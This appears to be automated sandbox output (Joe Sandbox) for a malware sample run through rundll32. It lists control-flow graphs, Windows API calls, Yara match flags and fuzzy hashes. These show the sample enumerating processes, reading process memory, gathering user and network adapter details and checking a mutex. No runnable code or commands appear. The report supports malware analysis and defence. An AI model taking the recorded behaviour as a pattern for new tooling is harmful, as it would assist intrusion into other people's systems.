wsprintfW 51184->51185 51186 26387cfc676 51185->51186 51187 26387cf7b40 NtFreeVirtualMemory 51186->51187 51187->51180 51189 26387cfc76f wsprintfW 51188->51189 51190 26387cfc7da 51189->51190 51191 26387cf7b40 NtFreeVirtualMemory 51190->51191 51191->51177

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 26387cf463c-26387cf46b9 GetModuleHandleW GetCurrentProcessId call 26387cf7b80 call 26387cf8ae0 call 26387cfae78 7 26387cf46cd-26387cf46d5 0->7 8 26387cf46bb-26387cf46cb 0->8 9 26387cf46dd-26387cf470b call 26387cfbc1c call 26387cfcbbc 7->9 8->9 14 26387cf4711-26387cf471d 9->14 15 26387cf471f-26387cf472f call 26387cf8560 call 26387cf8fe0 14->15 16 26387cf4735-26387cf4741 14->16 15->16 18 26387cf474f-26387cf475b 16->18 19 26387cf4743-26387cf4749 GetCurrentProcessId 16->19 21 26387cf4b32-26387cf4b36 18->21 22 26387cf4761-26387cf4769 18->22 19->18 21->14 23 26387cf4b3c-26387cf4b44 21->23 25 26387cf478d-26387cf47ae GetCurrentProcessId OpenProcess 22->25 26 26387cf476b-26387cf4783 call 26387cf841c 22->26 28 26387cf4c1c-26387cf4c21 23->28 29 26387cf4b4a-26387cf4b82 call 26387cfbc64 call 26387cfbb2c 23->29 25->21 27 26387cf47b4-26387cf4815 NtQueryInformationProcess 25->27 26->25 38 26387cf4785 26->38 32 26387cf481b-26387cf4824 27->32 33 26387cf4b27-26387cf4b2c CloseHandle 27->33 35 26387cf4c28-26387cf4c34 28->35 36 26387cf4c23 call 26387cf4c38 28->36 47 26387cf4b88-26387cf4b9f call 26387cfae78 29->47 48 26387cf4c14 29->48 32->33 39 26387cf482a-26387cf487b ReadProcessMemory 32->39 33->21 36->35 38->25 39->33 42 26387cf4881-26387cf48d5 ReadProcessMemory 39->42 42->33 44 26387cf48db-26387cf48e5 42->44 44->33 46 26387cf48eb-26387cf4999 call 26387cfad34 WideCharToMultiByte call 26387cfbfcc * 2 44->46 63 26387cf499b-26387cf49d2 call 26387cfbfcc 46->63 64 26387cf49f4-26387cf49fa 46->64 54 26387cf4ba1-26387cf4bb1 47->54 55 26387cf4bb3-26387cf4bbb 47->55 48->28 56 26387cf4bc3-26387cf4be7 call 26387cfbeb0 call 26387cfb900 54->56 55->56 70 26387cf4be9-26387cf4bf1 56->70 71 26387cf4bf3 56->71 63->64 74 26387cf49d4-26387cf49ef call 26387cfbfcc 63->74 66 26387cf4a1c-26387cf4a53 call 26387cf6298 * 2 64->66 67 26387cf49fc-26387cf4a17 call 26387cfbfcc 64->67 84 26387cf4a59 66->84 85 26387cf4b04-26387cf4b09 66->85 67->66 75 26387cf4bfb-26387cf4c12 call 26387cf7b40 70->75 71->75 74->64 75->28 88 26387cf4a62-26387cf4a7e call 26387cfbd7c 84->88 86 26387cf4b1d-26387cf4b22 call 26387cf7b40 85->86 87 26387cf4b0b-26387cf4b13 85->87 86->33 87->86 89 26387cf4b15 87->89 93 26387cf4a80-26387cf4aaa call 26387cfbc1c call 26387cfad90 88->93 94 26387cf4aac-26387cf4ac1 88->94 89->86 93->88 96 26387cf4af3-26387cf4afd call 26387cf6298 94->96 97 26387cf4ac3-26387cf4af1 call 26387cfbc1c call 26387cf6298 94->97 96->85 97->85
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentMemory$HandleRead$AllocateByteCharCloseInformationModuleMultiNameOpenQueryUserVirtualWidewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3997021431-0
                                                                                    • Opcode ID: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
                                                                                    • Instruction ID: 8fde4dc656b34f68f0f602b0aa243a77776fb7993cfde411e31669ff351aecaa
                                                                                    • Opcode Fuzzy Hash: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
                                                                                    • Instruction Fuzzy Hash: 93F12F31609B8096E760DB25E4483DEB7B2F785744F501125F68D87BAADFBEC64ACB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCloseCreateInitStringUnicode
                                                                                    • String ID: 0$@
                                                                                    • API String ID: 2504508917-1545510068
                                                                                    • Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                                                                                    • Instruction ID: b5d0f62519929cdae70c402145191f7be673be84652c5c0dcc4dfb58eca3e55e
                                                                                    • Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                                                                                    • Instruction Fuzzy Hash: 0521C272518A809BE760DF10E45838FB7B1F7C0348F904115E6C987AAACBBED65ACF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFileInitStringUnicode
                                                                                    • String ID: 0$@
                                                                                    • API String ID: 2498367268-1545510068
                                                                                    • Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                                                                                    • Instruction ID: 413427baa21b16114efc0b662070108d2f99f0181ceed43a69512a66fd1e3a78
                                                                                    • Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                                                                                    • Instruction Fuzzy Hash: 3C21BF7250878086E760CF14F45478EBBB1F384358F908219E2D947AA9CB7DD559CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                    • String ID: o
                                                                                    • API String ID: 2718687846-252678980
                                                                                    • Opcode ID: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
                                                                                    • Instruction ID: 58a300e0c0e995b4d5ac01e44fa262c1da2004fac24f0788b731a82c178bd12a
                                                                                    • Opcode Fuzzy Hash: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
                                                                                    • Instruction Fuzzy Hash: EF110372908B0486D770DB11E04839EB7B1F3897A8F441255F68D47B69DBBDC7858B04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 354 26387cfb0c4-26387cfb0f3 call 26387cfbf4c 357 26387cfb0f9-26387cfb13e call 26387cfae1c NtOpenKey 354->357 358 26387cfb0f5-26387cfb0f7 354->358 362 26387cfb140 357->362 363 26387cfb148 357->363 360 26387cfb14d-26387cfb151 358->360 362->363 363->360
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID: 0$@
                                                                                    • API String ID: 71445658-1545510068
                                                                                    • Opcode ID: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
                                                                                    • Instruction ID: 274814cf49201e0722af6673aecc759e5ba8d184b844f1cc193a23932d263b80
                                                                                    • Opcode Fuzzy Hash: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
                                                                                    • Instruction Fuzzy Hash: 8301ECB261868096D760DF10E45438FBBB5F784388F904115F68987A6DDB7DC6558F40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: NameUserwsprintf
                                                                                    • String ID: engineer
                                                                                    • API String ID: 54179028-2484562649
                                                                                    • Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                                                                                    • Instruction ID: 6ede635d27a22e43dc8002f76b982acf49c34088e608828f969f5ed55db40ad5
                                                                                    • Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                                                                                    • Instruction Fuzzy Hash: 4DF0C971624986A3EB60EB10E8887ED6372FB80744FC02021B15D475A9EFBEC71EDB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
                                                                                    • Instruction ID: 057ac07513b379ac38419d14786f43ef4b68bc15784fb1c4056ec1ef80a0f44f
                                                                                    • Opcode Fuzzy Hash: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
                                                                                    • Instruction Fuzzy Hash: 4F41F932629A8086D750DF25E48879EBBB1F7C4788F905015FA8E83B6ADF7DC645CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DirectorySystem
                                                                                    • String ID:
                                                                                    • API String ID: 2188284642-0
                                                                                    • Opcode ID: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
                                                                                    • Instruction ID: 852f2e12bb5dd976923d3c115458c0ff8bf137ba7c6cc03d4196b72d311342c2
                                                                                    • Opcode Fuzzy Hash: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
                                                                                    • Instruction Fuzzy Hash: 1A313032918A8197E670DB10E44C3DEE776F785354F501225B6AE436EEDFADC606DB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID: @
                                                                                    • API String ID: 2167126740-2766056989
                                                                                    • Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                                                                                    • Instruction ID: 04a91b231d6eff034d233be8d34d76217f0c30f4cbc8f39264203e93498a46e6
                                                                                    • Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                                                                                    • Instruction Fuzzy Hash: 1AE01C7262868082D640DF14E45474EB371F7847B4F402301BAA947AD9CBBDC1188B00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateFileMemoryReadVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1637922817-0
                                                                                    • Opcode ID: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
                                                                                    • Instruction ID: 69e02354ef5b12945f2ed84aab34b1853cb02b2197de43972e308b7809996985
                                                                                    • Opcode Fuzzy Hash: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
                                                                                    • Instruction Fuzzy Hash: 5E21D832618BC48AD760CB65E45439EB7B5F388790F908425EB8D83B68EFBDC654CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFileInitStringUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 2498367268-0
                                                                                    • Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                                                                                    • Instruction ID: 14551443c2e41ee8ea73a71448e76d33cea84fc8cc3964c9b871a3d50c4e7c71
                                                                                    • Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                                                                                    • Instruction Fuzzy Hash: 8001E532608A40C3D630DB15E44428EBBB1F788788F941215FA8C87A6EDB7ECB56CF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
                                                                                    • Instruction ID: 4fac89c3d039f52958f1a4a3fb04d3c81b4f188b5462cd0164c0852b01e085b7
                                                                                    • Opcode Fuzzy Hash: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
                                                                                    • Instruction Fuzzy Hash: 5CF04F7162864096E770DB10E84878E6771F7843B8F501315FAAD47ADECBBEC3458B00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                                                                                    • Instruction ID: f95596a619de786b6d46a8a04a8caab50141bb3ead34685b8ad8021bb6d2b032
                                                                                    • Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                                                                                    • Instruction Fuzzy Hash: 72F0C432918B9086D360CB64F44474BB7B1F384754F605125E6C983F28DBBDC2548F40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3963845541-0
                                                                                    • Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                                                                                    • Instruction ID: cb3398f16dff13f1946a51d5c7984a9e1a1ad454dfdd2d516e5d3ec04d27d427
                                                                                    • Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                                                                                    • Instruction Fuzzy Hash: 2AE0EC72508A8192D7609B60E44878A7770F3853B8F944305EAB943AE8CF7DC29ACF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 107 180070044-1800700c2 108 1800700c7-1800700c9 107->108 109 1800700cd-1800700d8 108->109 109->109 110 1800700da-1800700dd 109->110 110->108 111 1800700df-1800700e3 110->111 112 1800701a6 111->112 113 1800700e9-1800700fa 111->113 115 1800701aa-1800701fc call 1800704f0 * 3 VirtualAlloc 112->115 114 1800700fd-18007010a 113->114 116 180070118-18007011d 114->116 117 18007010c-180070116 114->117 119 180070120-18007012a 116->119 117->116 117->117 119->119 121 18007012c-18007012f 119->121 123 180070131-180070139 121->123 124 18007018f-180070195 121->124 127 18007013c-18007014a 123->127 124->114 126 18007019b-18007019e 124->126 126->115 130 1800701a0-1800701a4 127->130 131 18007014c-180070156 127->131 130->115 131->131 132 180070158-18007015b 131->132 132->130 133 18007015d-18007016a 132->133 134 180070171-180070179 133->134 135 18007016c 133->135 136 180070180-180070184 134->136 137 18007017b 134->137 135->134 136->124 138 180070186-18007018d 136->138 137->136 138->127
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: )RxR$MN(U$S5Xl$k$pOdy$w
                                                                                    • API String ID: 4275171209-2056616801
                                                                                    • Opcode ID: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
                                                                                    • Instruction ID: 4deb1cea13ac9b666c555f1b3f310a4baaf57dd73fee47670c94506e3a1fa1fc
                                                                                    • Opcode Fuzzy Hash: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
                                                                                    • Instruction Fuzzy Hash: 78413772705648C6EBA68F21E004B9E7BB1F348BC8FA4C115EE4947B89CB7EC649C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 139 26387cf33ac-26387cf3402 call 26387cf30d0 142 26387cf340b-26387cf341b call 26387cf3250 139->142 143 26387cf3404-26387cf3406 139->143 147 26387cf3421-26387cf345c call 26387cfbc64 call 26387cfbb2c call 26387cf6b9c * 2 call 26387cf7588 142->147 148 26387cf371c 142->148 144 26387cf371e-26387cf3725 143->144 159 26387cf3712-26387cf3717 call 26387cf7b40 147->159 160 26387cf3462-26387cf349f call 26387cfbc64 call 26387cfbb2c call 26387cf6b9c call 26387cf7504 147->160 148->144 159->148 170 26387cf34a1-26387cf34a3 160->170 171 26387cf34a8-26387cf34bf call 26387cfae78 160->171 170->144 174 26387cf34c1-26387cf34ce 171->174 175 26387cf34d0-26387cf34d8 171->175 176 26387cf34dd-26387cf34f7 wsprintfW 174->176 175->176 177 26387cf34fd-26387cf3514 call 26387cfae78 176->177 178 26387cf3597-26387cf35ae call 26387cfae78 176->178 185 26387cf3516-26387cf3523 177->185 186 26387cf3525-26387cf352d 177->186 183 26387cf35b0-26387cf35bd 178->183 184 26387cf35bf-26387cf35c7 178->184 187 26387cf35cc-26387cf35f6 wsprintfW call 26387cfae78 183->187 184->187 188 26387cf3532-26387cf3561 wsprintfW call 26387cfae78 185->188 186->188 193 26387cf35f8-26387cf3605 187->193 194 26387cf3607-26387cf360f 187->194 195 26387cf3572-26387cf357a 188->195 196 26387cf3563-26387cf3570 188->196 197 26387cf3614-26387cf3639 wsprintfW 193->197 194->197 198 26387cf357f-26387cf3592 wsprintfW 195->198 196->198 199 26387cf363f-26387cf36aa call 26387cf3728 call 26387cf7b40 * 3 call 26387cf3c2c call 26387cf3a24 call 26387cfad34 197->199 198->199 214 26387cf36ac-26387cf36c5 call 26387cfba98 199->214 215 26387cf3703-26387cf370b ExitProcess 199->215 218 26387cf36ea-26387cf36f4 call 26387cfb400 214->218 219 26387cf36c7-26387cf36e5 call 26387cfba98 * 2 214->219 215->159 222 26387cf36f9-26387cf36fe call 26387cf7b40 218->222 219->218 222->215
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
                                                                                    • Instruction ID: 6919fe17dea88cd44ec24a09a3837bfdb2299d1effe8cc507826e366800b5bbf
                                                                                    • Opcode Fuzzy Hash: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
                                                                                    • Instruction Fuzzy Hash: 1A91D332615F85A6EA60DB10F4583DEB772F785384F901015F68E43AAEDFBAC646CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
                                                                                    • Instruction ID: bb178580fe23b7e4145caa09fa124ba38b47075b3f7f87ea695df72196093c5a
                                                                                    • Opcode Fuzzy Hash: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
                                                                                    • Instruction Fuzzy Hash: E5513D31608A8093E760DB15F45839EB771F7857A4F201215FAAD47BE9CFBAC586CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 269 26387cf3868-26387cf388f call 26387cfae1c call 26387cf6328 274 26387cf3891-26387cf3896 269->274 275 26387cf389b-26387cf38a2 call 26387cf3074 269->275 276 26387cf3a1a-26387cf3a21 274->276 279 26387cf38ae-26387cf38bf call 26387cf8560 call 26387cf8820 275->279 280 26387cf38a4-26387cf38a9 275->280 285 26387cf38d2-26387cf38da call 26387cf8820 279->285 286 26387cf38c1-26387cf38c6 279->286 280->276 290 26387cf38ed-26387cf390e GetCurrentProcess IsWow64Process 285->290 291 26387cf38dc-26387cf38e1 285->291 286->285 288 26387cf38c8-26387cf38cd 286->288 288->276 293 26387cf3910-26387cf3915 290->293 294 26387cf391a-26387cf3921 call 26387cf68e8 290->294 291->290 292 26387cf38e3-26387cf38e8 291->292 292->276 293->276 297 26387cf392d-26387cf3941 call 26387cfae78 294->297 298 26387cf3923-26387cf3928 294->298 301 26387cf394f-26387cf3954 297->301 302 26387cf3943-26387cf394d 297->302 298->276 303 26387cf3959-26387cf3977 CreateMutexW 301->303 302->303 304 26387cf398d-26387cf399a 303->304 305 26387cf3979-26387cf398b GetLastError 303->305 304->276 305->304 306 26387cf399c-26387cf39b3 GetModuleHandleW call 26387cf463c 305->306 309 26387cf39bc-26387cf39c3 call 26387cf6988 306->309 310 26387cf39b5-26387cf39ba 306->310 313 26387cf39cc-26387cf39d3 call 26387cf6864 309->313 314 26387cf39c5-26387cf39ca 309->314 310->276 317 26387cf39dc-26387cf39e8 call 26387cfd134 call 26387cf378c 313->317 318 26387cf39d5-26387cf39da 313->318 314->276 323 26387cf39fb 317->323 324 26387cf39ea-26387cf39f4 call 26387cf33ac 317->324 318->276 326 26387cf3a05-26387cf3a16 call 26387cf6250 323->326 327 26387cf39f9 324->327 326->276 327->326
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
                                                                                    • Instruction ID: 26a05c7680bd88e8fba76ba9a4bca23d8fb8dd8c555a8cae441af842280e2dec
                                                                                    • Opcode Fuzzy Hash: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
                                                                                    • Instruction Fuzzy Hash: 37413130905640A7FA60EB65980C3DD72B2BB45368F101316F56E876DFDBBBC70A8B15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                                                                                    • Instruction ID: 14149051a53d77b0367e81ea4a6e8f3651a86a6c31b2c5be2f48ce3d70a845ec
                                                                                    • Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                                                                                    • Instruction Fuzzy Hash: FE011D32618A40C7E7A0DB11E88875EB7B2FBC8748F441215B68E87668DF7CC61ACB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
